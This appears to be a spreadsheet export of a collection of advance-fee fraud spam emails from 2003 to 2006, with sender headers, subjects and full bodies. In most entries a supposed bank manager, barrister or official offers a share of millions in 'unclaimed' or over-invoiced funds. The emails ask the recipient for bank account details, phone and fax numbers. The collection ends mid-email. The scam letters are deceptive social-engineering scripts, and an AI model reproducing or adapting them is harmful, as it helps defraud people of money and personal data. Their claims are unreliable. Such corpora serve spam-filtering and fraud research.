    <t>\nDear Friend,I know that this mail will come to you as a surprise as we have never met before. My name is  Mr Adams   Swll.   I am the bill and exchange manager in African Development Bank. I hope that you will not expose or betray this trust and confidence that I am about to repose on you for the mutual benefit of our both families.I am writing in respect of a foreign customer of our Bank who perished along with his next of kin with Korean Air Line, flight number 801 with the whole passengers on 6th of august 1997 and for your perusal you can view this site [URL]http://www.cnn.com[/URL] the demise of this our customer, I personally have watched with keen interest to see the next of kin but all has proved abortive as no one has come to claim his funds of US$11.3M (Eleven Million Three Hundred Thousand United States Dollars) which has been with our branch for a very long time.On this note, I decided to seek for whom his name shall be used as the Next of Kin since nobody is coming for the fund again. The Banking ethics here do not allow such money to stay more than 10 years, because the money will be recalled to our Banks treasury as unclaimed fund after this period.In view of this I got your contact through the Internet when I was making a research on a foreigner that I will use in this great opportunity because I don't want the money to be recalled to our Bank treasury as unclaimed fund. I have also agreed to offer 40% of the total sum and the rest 60% will be for me.\nThe reason for a foreigner in the business is for the fact that the deceased man was a foreigner and it is not authorized by the law guiding our Bank for a citizen of this country to make the claim of the fund.So the request for you as a foreigner to come into the business is necessary, it will facilitate the release and transfer of the fund smoothly into your reliable Bank account as the only surviving relation to the deceased.If you are really sure of your integrity, trustworthy and confidentiality, and accept not to cheat or disappoint me after this business, reply with your telephone and fax numbers and Banking account details where you wish to receive the fund.Upon receipt of the above mentioned information, indicating your interest in the business, I will send you by fax or e-mail a letter of application which you will type and send back to our bank to enable us start this transaction.I will not fail to bring to your notice that this business is risk free and doesn't have any negative implication. You should not entertain any fear as all modalities for the smooth and easy transfer of this fund have been finalized. This transaction will be completed within 14 bank working days immediately we start the business.Waiting for your urgent response and please kindly delete if you are not interested.Regards, Mr Adams   Swll\nAfrican Development BankOuagadougou, Burkina Faso. \n \n_________________________________________________________________\nFind a local pizza place, movie theater, and more….then map the best route!\n[URL]http://maps.live.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cnn.com http://maps.live.com</t>
  </si>
  <si>
    <t>To: engr_vict@shuf.com\nFrom: CARLOS SAVIMBI &lt;carlos_sav@go.com&gt;\nDate: Wed, 14 May 2003 12:15:24 -0700</t>
  </si>
  <si>
    <t>Wed, 14 May 2003 12:15:24 -0700</t>
  </si>
  <si>
    <t>CARLOS SAVIMBI &lt;carlos_sav@go.com&gt;</t>
  </si>
  <si>
    <t>engr_vict@shuf.com</t>
  </si>
  <si>
    <t>Letter from Tenders Board (Urgent)</t>
  </si>
  <si>
    <t>Dear Sir, \n\nI am Engr. Victor Chigoziem with the Engineering Stores\nDepartment of the Federal Ministry of Agriculture and Natural Resources and member of Tenders Board. We have urgent need for a trustworthy foreign contact person with whom we can carry out a successful business deal.\nFederal Government has voted the sum of US$1.86 Billion for Local \nProduction of food crops. The Government has also considered the impact \nof the importation of some food items like Rice, Beans, Frozen Chicken \nand Turkeys and other food stuffs on the Nations Foreign Reserve and \nhave banned the importation of the items that could be produced locally. As a  result, the ederal Ministry of Agriculture and Natural Resources has been mandated to import Agricultural Equipments for supply to Local Farmers both at SUBSISTENT AND COMMERCIAL level to encourage them to produce enough food items for local consumption and for export to other African Countries. We have already started\nawarding new contracts for supply of the equipments to successful bidders.\nWe want you to submit to us immediately your complete company name, \naddress, your name as President or Managing Director / CEO of the \ncompany, our banking particulars:- (banks name address, telephone, fax \nand telex numbers.\nYour receiving number, swift and routing numbers), with \nthese informations, we can get you properly registered as one of the \ncontractors of FMANR who has already been awarded part of this contract for the sum of US$113.4 Million to supply some of the Agricultural Equipments parts of which we already have in\nour custody (stores). \n\nAfter receiving the above needed and stated information from you, we \nwill process all the documentation and submit them for immediate \napprovals  and the Federal Government will pay 25% of US$113.4 \nMillion into your nominated bank account in the name of your company as the beneficiary, which is US$28.35M . In no time, the remaining\nUS$85,050,000.00 Million shall be paid as balance payment or we together in agreement as partners will use another foreign firm's name that will carry out the supply of the remaining equipments as a sub-contractor to you in our documentation to receive \nthis balance payment. \n\nWe shall come to your country immediately this fund is in your account \nto share the US$28.35 Million. The sharing pattern should be negotiated \nby both parties concerned.\nHowever, be rest assured that no risk is involved or any scandal in the\nfuture, for we have done all our homework very well, nobody will be hurt during and after this transaction. It \nmay also please you to know that all the GOODS that cover the 25% payment are on record, only us that are key members of the contract board committee has this knowledge and information.\nThere is the serious need to keep this transaction secret and very\nconfidential. To that effect, I would require your private phone and fax numbers for easy and confidential communication. \n\nI await your immediate response to this Proposal. Meanwhile, I look \nforward to establishing life long business relationship with you. \n\nThe nature of your company or business does not necessarily have to be \nAgriculturally related but ownership of a company is a criterium for \nthe project, please contact me through my personal email address \n(carlos_sav@myself.com) or (engr_victor@inbox.lv). \n\n\nBest regards, \nEngr. Victor\nChigoziem \n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://mail.go.com</t>
  </si>
  <si>
    <t>180</t>
  </si>
  <si>
    <t>To: jamesoni2002@go.com\nFrom: James Oni &lt;jamesoni2000@go.com&gt;\nDate: Wed, 14 May 2003 02:07:13 -0700</t>
  </si>
  <si>
    <t>Wed, 14 May 2003 02:07:13 -0700</t>
  </si>
  <si>
    <t>James Oni &lt;jamesoni2000@go.com&gt;</t>
  </si>
  <si>
    <t>jamesoni2002@go.com</t>
  </si>
  <si>
    <t>ASISSTANCE.</t>
  </si>
  <si>
    <t>Barrister.james oni\nE-mail:jamesoni2002@rediffmail.com\n\nDear Friend\n\nIt is obvious that this proposal will come to you as a suprise. This is\nbecause we have not met before but i am inspired to sending you this email\nby the huge fund transfer opportunity that will be of mutual benefit to\nthe two of us.However, I am Barrister  james oni,the Personal Attorney\nto the late Engr.Brian Loyd Smith a national of Isle ofMan in UK, who used to work\nwith Shell Petroleum Development Company(SPDC)\nin Nigeria.\nOn the 21st of April 1996, my client,his wife And their three children\nwere involved in a car accident along Sagamu/Lagos Express Road.\nUnfortunately they all lost their lives in the event of the accident,\nSince then I have made several enquiries to several Embassies to locate\nany of my clients extended relatives, this has also proved successful.\nAfter these several unsuccessful attempts, I decided to trace his\nrelatives over the Internet to locate any member of his family but of no\navail, hence I contacted you.\nI contacted you to assist in repartrating the money and property left\nbehind by my client,I can easily convince the bank with my legal practice\nthat you are the only surviving relation of my client. Otherwise the\nEstate he left behind will be confiscated or declared unserviceable by the\nbank where this huge deposits were lodged. Particularly, the Bank where\nthe deceased had an account valued at about $5million U.S dollars(  five\nMillion United State of America dollars).\nConseqently,The bank issued me a notice to provide the next of kin or have\nthe account confiscated within the next ten official working days. since i\nhave been unsuccesfull in locating the the relatives for over several\nyears now.I seek your consent to present you as the next of kin of the\ndeceased,so that the proceeds of this account valued at $5million U.S\ndollars can be paid to your account and then you and me can share the\nmoney.\nI have all necessary legal documents that can be used to back up any claim\nwe may make. All I require is your honest cooperation to enable us see\nthis deal through. I guarantee that this will be executed undera\nlegitimate arrangement that will protect you from any breach of the law.Please get\nin touch with me by my email:jamesoni2002@rediffmail.com to\nenable usdiscuss further.\nYours Faithfully,\n\nBarrister  james oni.\n\nN.B. Please indicate your telephone and fax numbers for easy communication\nin this mutual transaction. Please forward your reply to:\njamesoni2002@rediffmail.com.\n\n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2208</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr. David Perry &lt;at_at1@dacafe.com&gt;\nDate: Wed, 14 Jun 2006 05:57:06 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2006 05:57:06 -0700</t>
  </si>
  <si>
    <t>Mr. David Perry &lt;at_at1@dacafe.com&gt;</t>
  </si>
  <si>
    <t>LET ME HEAR FROM YOU ASAP</t>
  </si>
  <si>
    <t>\n\n\n\nAttention,\n\nPlease accept my sincere apologizes if my email does not meet your\nbusiness or personal ethics. I will first introduce myself as Mr.David\nPerry, a staff in the Private Clients Section of a well-known bank, here\nin London, England.\n\nOne of our accounts, with holding balance of 15,000,000 (Fifteen Million\nPounds Sterling) has been dormant and last operated some years ago. From\nmy investigations and confirmation, the owner of the said account, a\nforeigner who died on Wednesday, July 13, 2005; Posted: 1:02 p.m. EDT\n(17:02GMT).He was among by London bomb victims identified.You can go\nthrough the website,\n\nWWW.CNN.COM/LONDONTERROR\n\nSince then, nobody has done anything as regards the claiming of this\nmoney, as he has no family member that has any knowledge as to the\nexistence of either the account or the funds; and also Information from\nthe National\nImmigration also states that he was single on entry into the UK.\n\nThis transaction is totally free of risk and troubles as the fund is\nlegitimate and does not originate from drug, money laundry, terrorism or\nany other illegal act and also I am going to secure all the legal\ndocuments that will acompany the fund to your account to prove that the\nfund is an inheritance fund,you should also know that inheritance fund\ndose not prohibited in any Country once the beneficiary have all the legal\ndocuments to prove the legality of the fund.\n\nOn your interest, Let me hear from you URGENTLY.\n\nWarm Regards,\nMr. Davis Perry.\n\n\n\n-----------------------------------------\nStay ahead of the information curve.\nReceive EDA news and jobs on your desktop daily.\nSubscribe today to the EDA CafeNews newsletter.\n[ [URL]http://www10.edacafe.com[/URL] ]\nIt's informative and essential.\nThis message was sent to you from a machine at 86.62.6.162\n\n\n</t>
  </si>
  <si>
    <t>http://www10.edacafe.com</t>
  </si>
  <si>
    <t>2206</t>
  </si>
  <si>
    <t>To: azize_ouattara@latinmail.com &lt;azize_ouattara@latinmail.com&gt;\nFrom: azize ouattara &lt;azize_ouattara@latinmail.com&gt;\nDate: Wed, 14 Jun 2006 05:00:56 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2006 05:00:56 +0200</t>
  </si>
  <si>
    <t>azize ouattara &lt;azize_ouattara@latinmail.com&gt;</t>
  </si>
  <si>
    <t>azize_ouattara@latinmail.com &lt;azize_ouattara@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.AZIZE  OUATTARA</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.AZIZE  OUATTARA\nBILL AND EXCHANGE MANAGER\nAFRICAN DEVELOPMENT BANK\nOUAGADOUGOU, BURKINA FASO\n\nI AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF AFRICAN DEVELOPMENT BANK BURKINA FASO. I GOT YOUR CONTACT ADDRESS THROUGH INTERNET NET WORK SEARCH WHEN SEARCHING FOR A GOOD AND RELIABLE PERSON THAT WILL ASSIST ME IN THIS TRANSACTION.\n\nIN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF 22.85M US DOLLARS (TWENTY TWO MILLLION EIGHT HUNDRED AND FIFTY THOUSAND US DOLLARS)IN AN\nACCOUNT THATBELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ON 25TH JULY 2000 IN SUPER SONIC CONCORDE PLANE CRASH AT CHARLES DE GAULLE AIRPORT IN PARIS FRANCE ALONG WITH HIS ENTIRE FAMILY.\n\nSINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT\nOF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT\nUNLESS SOMEBODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED\nAS INDICATED IN OUR BANKING GUIDELINES BUT UNFORTUNATELY WE LEARNT THAT\nALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM.\n\n IT IS THEREFORE UPON THIS DISCOVERY THAT I DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND I DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nTHE BANKING LAW AND GUIDELINE HERE STIPULATES THAT IF SUCH MONEY REMAINED\nUNCLAMED AFTER SEVEN YEAR, THE MONEY WILL BE TRANSFERED INTO THE BANK\nTREASURY AS UNCLAIMED FUND.\n\nTHE REQUEST OF FOREIGNER AS NEXT OF KIN IN THIS BUSINESS IS OCCASIONED BY\nTHE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE CANNOT STAND AS NEXT OF KIN TO A FOREIGNER.\n\nI AGREE THAT 30% OF THIS MONEY WILL BE FOR YOU AS FOREIGN PARTNER, IN\nRESPECT TO THE PROVISION OF A FOREIGN ACCOUNT AND 70% WOULD BE FOR ME;\nTHEREFORE TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS\nARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATIONS OR NEXT OF KIN OF\nTHE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR\nPRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN  THE MONEY WILL BE REMITTED.\n\nUPON RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF\nTHE APPLICATION. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS\nTRANSACTION IS HITCH FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF\nFEAR AS ALL REQUIRED ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER.\nYOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS MAIL   THROUGH MY  PRIVATE LINE  22676 08 66 92\n\nYOUR'S FAITHFULLY\nMR.AZIZE  OUATTARA\nBILL AND EXCHANGE MANAGER\nAFRICAN DEVELOPMENT BANK\nOUAGADOUGOU,BURKINA FASO\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>810</t>
  </si>
  <si>
    <t>To: R@S\nFrom: info@crack-ag.com &lt;info@crack-ag.com&gt;\nDate: Wed, 14 Jul 2004 16:24:45 -0000</t>
  </si>
  <si>
    <t>Wed, 14 Jul 2004 16:24:45 -0000</t>
  </si>
  <si>
    <t>info@crack-ag.com &lt;info@crack-ag.com&gt;</t>
  </si>
  <si>
    <t>business proposal</t>
  </si>
  <si>
    <t>Kind Attn: CEO/ Manager Director  Supply Quality China's EXCLUSIVE dimensions at Unbeatable Price. Dear Sir,  We are pleased to inform you as one of China's largest export &amp; import stone company-Wanlistone Group, The Group its subsidiaries specialize in the quarrying, processing and Sales of dimension stone, slab and tiles and dimension stone products for the building materials sector and specialty markets.  The Group operations are based in Xiamen, South of China, which is the largest export and import business portals in China where Wanlistone owns and operates various natural stone deposits with 6,000 square meters through the country. In addition to the quarries Wanlistone has a fully automated processing plant for the processing of the granite and marble and granite products.  Wanlistone supplies granite in raw block form, granite and marble tile and strips of varying dimension, memorial materials and specialty products to both the local but more specifically the export markets.  The Group has a full rang of the China natural stone products including  Pink color G636, G617, G635, G663, Yellow color, G682,Dark G654, Black G684.  Light Grey: Imperial Grey, Huaan Grey.  Wanlistone owns and operates all its own quarries, including North Black, Huana White, Butterfly Blue, and Golden Beige. All block production is sold to both the local and international markets. The Group is very price competitive on all its products due to its low overhead structure. All blocks are ideally produced for gang saw processing and dimension of 240 x 120 are standard. Smaller blocks are also available for selection  We will feel it an honour if we could serve you and welcome your inquiry in our products. Looking forward to hearing from you soonest.  Sincerely yours, Sales Department  XIAMEN WANLI STONE GROUP, 8 F Fortune Building , 201 North Hubin Rd, Xiamen 361012, P.R.China.  Tel:+86-592 -5081199  Fax:+86-592-5620 971 Web site: [URL]www.wanli.com[/URL]   ------------------------------------------------------------------------------------------------------ 	 Company profile:  Established in 1985  Located in Xiamen as No.1 port of stone Exp.&amp; Imp. Total assets: US$10Million  Turnover of export in 2003: US$0.28 billion  Advantages in China:  The No.1 professional &amp; over-sized stone group at present, its business are associated with import &amp; export t, processing and manufacturing, and quarrying.  One of the largest exporters of stone products  One of the leading importers of stone blocks from the world  Group structure:  XIAMEN WANISTONE as headquarter of operation and management, total 9 business departments, 1 design department, 1 resource development section of which,  Subsidiary company list:  1.	XIAMEN ORITENT WANLISTONE COMPANY, a joint venture with MARLING and DORKING in South African, specializes in all types of stone blocks worldwide. And two blocks depots of 6,000 square meter.  2.	AMERICA SINASTONE CO.,LTD, a professional supplier of all kinds of  monuments business in USA market place  3.	SOUTH AFRICA WANLINSTONE CO., LTD, a factory invested with MARLING and DORKING, is to process special monuments, slab and tiles  Own Factories list  1.	XIAMEN WANLISTONE CO, LTD, with 8 modern high speed granite gang saws, Gaspari Menotti, , 2 sets marble gang saws, 30 sets circular saws, for slab, tile and all profile stone finish  2.	XIAMEN WANLISTONE CRAFT CO, LTD, Monuments is key.  3.	LINGFONG WANLISTONE FACTORY IN QUANZHOU CITY, Monuments is key. 4.	TIANJING WANLISTONE FACTORY in north of China, Slab + Monuments produced  5.	HUNAN HUAJIAN FACTORY in Hunan, Granite slab + tile available  Own quarries list  1．	IMPERIAL GREY，located in HUNAN province  2．	NORTH BLACK，Located in SHANXI province 3．	HUNAN WHITE ， located in HUNAN province 4．	BUTTERFLY BLUE ，Located in LEMONGGU province  5．	GOLDEN BEIGE ，Located in SHANXI province Key market:  Japan   50% USA    15% EU     20% China   15% Products involve construction materials, monuments and stone finishes.  World stone connecting  Very good connecting with the famous stone companies as for growth up together.</t>
  </si>
  <si>
    <t>www.wanli.com</t>
  </si>
  <si>
    <t>809</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr Frank &lt;frank13_@mailsurf.com&gt;\nDate: Wed, 14 Jul 2004 05:14:24 +0000</t>
  </si>
  <si>
    <t>Wed, 14 Jul 2004 05:14:24 +0000</t>
  </si>
  <si>
    <t>Mr Frank &lt;frank13_@mailsurf.com&gt;</t>
  </si>
  <si>
    <t>Request for personal assistance</t>
  </si>
  <si>
    <t>&gt;From The Desk Of Independent Committee of \nEminent Persons (ICEP), Switzerland.\n\nAttention : Sir/Madam\n\nMy name is Mr Frank a member of Independent Committee of \nEminent Persons (ICEP), Switzerland. ICEP is charged with the responsibility of finding bank accounts in Switzerland belonging to non-Swiss indigenes, which have remained dormant since World War II. \nIt may interest you to know that in July of 1997, the Swiss Banker's \nAssociation published a list of dormant accounts originally opened by \nnon-Swiss citizens. These accounts had been dormant since the end of World War II (May 9, 1945). Most belonged to Holocaust victims. \nThe continuing efforts of the Independent Committee of Eminent Persons \n(ICEP) have since resulted in the discovery of additional dormant \naccounts - 54,000 in December, 1999. \n\nThe published lists contain all types of dormant accounts, including \ninterest-bearing savings accounts, securities accounts, safe deposit \nboxes, custody accounts, and non-interest-bearing transaction accounts. \nNumbered accounts are also included. Interest is paid on accounts that \nwere interest bearing when established. \nThe Claims Resolution Tribunal (CRT) handles processing of all claims \non accounts due non-Swiss citizens. A dormant account of ORDNER ADELE \nwith a credit balance of 50,000,000 US dollar plus accumulated interest \nwas discovered by me. The beneficiary was murdered during the holocaust \nera, leaving no WILL and no possible records for trace of heirs. \nThe Claims Resolution Tribunal has been mandated to report all \nunclaimed funds for permanent closure of accounts and transfer of existing credit balance into the treasury of Switzerland government as provided by the law for management of assets of deceased beneficiaries who died interstate (living no wills). \n\nBeing a top executive at ICEP, I have all secret details and necessary \ncontacts for claim of the funds without any hitch. The funds will be \nbanked in the U.A.E Dubia, being a tax free country, where we can safely withdrew the funds and we can share the funds and use  it for investment of our choice. \nDue to the sensitive nature of my job, I need a foreigner to HELP claim \nthe funds. All that is required is for you to provide me with your \ndetails for processing of the necessary legal and administrative claim \ndocuments for transfer of the funds to you. \nKindly provide me with your full name, address, and telephone/fax. I \nwill pay all required fees to ensure that the fund is transferred to a \nsecure, numbered account in your name in the U.A.E Bank in Dubia, of which you will be capable of accessing the funds gradually and transferring to your country and other banks of  your choice in the world. My share will be 60 percent and your share is 40 per cent of the total amount. THERE IS NO RISK INVOLVED. \n\nYou can find additional information about unclaimed funds through the \ninternet at the following websites: \n[URL]www.swissbankclaims.com[/URL] \n[URL]http://www.cnn.com[/URL] \n\n[URL]www.avotaynu.com[/URL] \n[URL]www.icheic.org[/URL] \n[URL]www.livingheirs.com[/URL] \n[URL]www.wiesenthal.com[/URL] \n\nThe Holocaust Claims Processing Office has put funds in Escrow awaiting \nsubmission of valid claims for necessary disbursement. \nI find myself priviledged to have this information and this may be a \ngreat opportunity for a life time of success without risks. \nDue to security reasons, reply to my via email only. You may reply to \nme securely on the following email, \nfrank1@mailsurf.com  or frankeze_2004@fastermail.com\nThank you for your prompt response. \nMr Frank Eze\n\n\n</t>
  </si>
  <si>
    <t>545</t>
  </si>
  <si>
    <t>To: paubel@UM\nFrom: blessed ogbe &lt;blog333@webmail.co.za&gt;\nDate: Wed, 14 Jan 2004 20:16:05 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Jan 2004 20:16:05 +0200</t>
  </si>
  <si>
    <t>blessed ogbe &lt;blog333@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>paubel@UM</t>
  </si>
  <si>
    <t>SOLICITATION</t>
  </si>
  <si>
    <t>Attn:The President/CEO\n\n           I crave your indulgence as I contact you in such\na surprising manner. But I respectfully insist you read\nthis letter carefully as I am optimistic it will open doors\nfor unimaginable financial reward for both of us. \n\nThis business transaction might not fall within the wide\nspectrum of your business activities, but I plead your\nassistance, as your flair for profitable business is\nneeded.\nPermit me to introduce myself,I am Dr Blessed Ogbe the\nBanking officer to Engr.Johnson Creek  who was a major\ncontractor to oil companies,.On the 21st of April 2000,my\nlient, his wife and their three children were involved in a\ncar accident along Sagamu / Lagos Express Road.\nUnfortunately they All lost their lives in the event of the\naccident.\n\nSince then I have made several enquiries to your Embassy to\nlocate any of my clients extended relatives, this has also\nproved unsuccessful. After these several unsuccessful\nattempts, I decided to trace his relatives over the\nInternet to locate any member of his family but of no\navail, hence I contacted you.I contacted you to assist in\nrepartrating the money and property left behind by my\nclient before they get confiscated or declared\nunserviceable by the bank where this huge deposits were\nlodged. Particularly,the Bank where the deceased had an\naccount valued at about US$15.2M (Fifteen  Million Two\nHundred Thousand United Stated Dollars). \n \nConseqently, the bank issued me a notice to provide the\nnext of kin or have the account confiscated. Since I have\nbeen unsuccesfull in locating the the relatives for over 2\nyears now. I seek your consent to present you as the next\nof kin of the deceased since you are from the same country\nso that the proceeds of this account valued at\nUS$15.2million can be paid to you and then you and me can\nshare the money. 60% to me and 40%\nto you.\n \nI have all necessary legal documents that can be used to\nback up any claim we may make. All I require is your honest\nco-operation to enable us see this deal through. I\nguarantee that this will be executed under a legitimate\narrangement that will protect you from any breach of the\nlaw. \n \nKindly email your  following confidential information to me\nurgently to enable us proceed:\n \na.Your complete names\nb.Your private telephone number\nc.Your private fax number\nd.Your private email address\n \nPlease direct your reply to my confidential\nemail:blog333ng@mail.az or through the below fax.You can\nalso reach me through my private telephone number  stated\nbelow for any enquiries.\n \nUpon the receipt of your information,I will advise you on\nthe modalities of the transaction.We have concluded details\non how to achieve success.\n \nYours Faithfully, \n \nDr.Blessed Ogbe\nPosition: Operation Director,\nPacific International Bank Plc,\n40,Marina Rd,Lagos,Nigeria.\nTel: 234-803-302-5573\nFax:234-9-272-2046\n___________________________________________\n Look Good, Feel Good [URL]www.healthiest.co.za[/URL]\n\n\n</t>
  </si>
  <si>
    <t>www.healthiest.co.za</t>
  </si>
  <si>
    <t>542</t>
  </si>
  <si>
    <t>To: frankdamas34@webmail.co.za\nFrom: frank damas &lt;frankdamas34@webmail.co.za&gt;\nDate: Wed, 14 Jan 2004 02:37:51 +0200</t>
  </si>
  <si>
    <t>Wed, 14 Jan 2004 02:37:51 +0200</t>
  </si>
  <si>
    <t>frank damas &lt;frankdamas34@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>frankdamas34@webmail.co.za</t>
  </si>
  <si>
    <t>FEEDBACK</t>
  </si>
  <si>
    <t>5/6 SUNNY ROAD \nGLENHAZEL JO, BORG\n2162 SOUTH AFRICA\n\nTEL:873-763619434\nFAX:873-763619436\n\n\n{URGENT AND CONFIDENTIAL)\n\n(RE: TRANSFER OF ($ 134,000.000.00 USD \nONE HUNDRED AND THIRTY FOUR MILLION DOLLARS ) \n\nDear,\n\nWe want to transfer to overseas ($ 134,000.000.00 USD) One\nhundred and Thirty four million United States Dollars) from\nNational Credit Bank (NCB) of South Africa, I want to ask\nyou to quietly look for a reliable and honest person who\nwill be capable and fit to provide either an existing bank\naccount or to set up a new Bank a/c immediately to receive\nthis money, even an empty a/c can serve to receive this\nmoney, as long as you will remain honest to me till the end\nfor this important business trusting in you and believing\nin God that you will never let me down either now or in\nfuture.\n\nI am MR FRANK DAMAS , the Auditor General in Natinal Credit\nBank (NCB) of South Africa, during the course of our\nauditing I discovered a floating fund in an account opened\nin the bank in 1993 and since 1999 nobody has operated on\nthis account again, after going through some old files in\nthe records I discovered that the owner of the account died\nwithout a [heir] hence the money is floating and if I do\nnot remit this money out urgently it will be forfeited for\nnothing. The owner of this account is Mr. Reed H.Huish, a\nforeigner, and a sailor, and he died, since 1999. And no\nother person knows about this account or any thing\nconcerning it, the account has no other beneficiary and my\ninvestigation proved to me as well that Reed H.Huish until\nhis death was the Reed H.Huish Coy.(pty). SA. \n\nWe will start the first transfer with Thirty four million\n[$34,000.000.00] upon successful transaction without any\ndisappoint from your side, we shall re-apply for the\npayment of the remaining rest amount of($ 100,000.000.00\nUSD) to your account.\n\nThe amount involved is ($ 134,000.000.00 USD) One hundred\nand thirty four million United States Dollars, only I want\nto first transfer $34,000.000.00 [thirty four million\nUnited States Dollar ]from this money into a safe\nforeigners account abroad before the rest, but I don't know\nany foreigner, I am only contacting you as a foreigner\nbecause this money can not be approved to a local person\nhere, without valid international foreign passport, but can\nonly be approved to any foreigner with valid international\npassport or drivers license and foreign a/c because the\nmoney is in us dollars and the former owner of the a/c Mr.\nReed H.Huish is a foreigner too, and the money can only be\napproved into a foreign a/c.\n\nHowever, we will sign a binding agreement, to bind us\ntogether I got your contact address from the Girl who\noperates computer, I am revealing this to you with believe\nin God that you will never let me down in this business,\nyou are the first and the only person that I am contacting\nfor this business, so please reply urgently so that I will\ninform you the next step to take urgently. Send also your\nprivate telephone and fax number including the full details\nof the account to be used for the deposit.\n\nI need your full co-operation to make this work\nfine.Because the management is ready to approve this\npayment to any foreigner who has correct information of\nthis account,which I will give to you, upon your positive\nresponse and once I am convinced that you are capable and\nwill meet up with instruction of a key bank official who is\ndeeply involved with me in this business. I need your\nstrong assurance that you will never, never let me down.\n\nWith my influence and the position of the bank official we\ncan transfer this money to any foreigner's reliable\naccount, which you can provide with assurance that this\nmoney will be intact pending our physical arrival in your\ncountry for sharing. The bank official will destroy all\ndocuments of transaction immediately we receive this money\nleaving no trace to any place and to build confidence you\ncan come immediately to discuss with me face to face after\nwhich I will make this remittance in your presence and\nthree of us will fly to your country at least two days\nahead of the money going into the account.\n\nI will apply for annual leave to get visa immediately I\nhear from you that you are ready to act and receive this\nfund in your account. I will use my position and influence\nto obtain all legal approvals for onward transfer of this\nmoney to your account with appropriate clearance from the\nrelevant ministries and foreign exchange departments.\n\nAt the conclusion of this business, you will be given 35%\nof the total amount, 60% will be for me, while 5% will be\nfor expenses both parties might have incurred during the\nprocess of transferring.\n\nI look forward to your earliest reply to phone and fax\nnumber above or[frankdamas@webmail.co.za]\n\n\nRegards,\n\nMR FRANK DAMAS\n\n___________________________________________\n Look Good, Feel Good [URL]www.healthiest.co.za[/URL]\n\n\n</t>
  </si>
  <si>
    <t>541</t>
  </si>
  <si>
    <t>To: barrisolu@fsmail.net\nFrom: WILLIAMS OLUFEMI &lt;barrisolu@fsmail.net&gt;\nDate: Wed, 14 Jan 2004 01:00:47 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Jan 2004 01:00:47 +0100</t>
  </si>
  <si>
    <t>WILLIAMS OLUFEMI &lt;barrisolu@fsmail.net&gt;</t>
  </si>
  <si>
    <t>barrisolu@fsmail.net</t>
  </si>
  <si>
    <t>PLEASE ASSIST</t>
  </si>
  <si>
    <t>FROM THE DESK OF\nOLUFEMI WILLIAMS\nHEAD FINANCE DEPARTMENT\nNIGERIAN PORTS AUTHORITY\nLAGOS.\n\n\nDear Sir, \nRE: URGENT &amp; CONFIDENTIAL BUSINESS PROPOSAL.\nAlthough this proposal might come to you as a\nsurprise, since it is from someone you do not know or have\nseen before, but based on recommendations, I\ngathered from a very reliable source here in Nigeria.\nI am the Director, fund co-ordinator of the Finance\nContract Department of Nigerian Ports Authority.\nThe crux of this letter is that the finance/contract\ndepartment of the NPA deliberately over-inflated the\ncontact values of various contract awarded. In the\ncourse of disbursement my office was able to track\ndown the sum of US$23.5M(Twenty Three Million, Five\nHundred Thousand U.S Dollars) as the over invoiced\nsum. This money is now floating in the NPA domiciliary\naccount with the Central Bank of Nigeria (CBN). I and my\ncolleagues now want to quickly transfer this fund to a safe\nnominated foreign account for possible investment abroad.\nWe are not allowed as a matter of government policy to\noperate any foreign account because of our status as\ncivil/public servants. Hence the need to solicit for your\nfull banking details, to enable us transfer this money into\nyour account.\nUpon your acceptance of this proposal, we have also\nagreed on a sharing ratio: \n1 25% for you as the account owner \n2 65% for I and my colleagues\n3 10% will be set aside to defray all incidental \nexpenses both locally and internationally during the\ncourse of this transaction.\nFurthermore, we shall be coming over to your country when\nthe money is finally in your account and we shall be relying\non your advise as regards to investment of our share. Be\ninformed that, this business is genuine and 100% safe\nconsidering the high powered government officials involved.\nSend by mail the following informations:-\n1, YOUR COMPANY NAME AND ADDRESS, BANK NAME, ADDRESS\nAND ACCOUNT NUMBER.\n2, YOUR TELEPHONE AND FAX NUMBER FOR EFFECTIVE\nCOMMUNICATION. \nThis is to effect the swift Transfer of 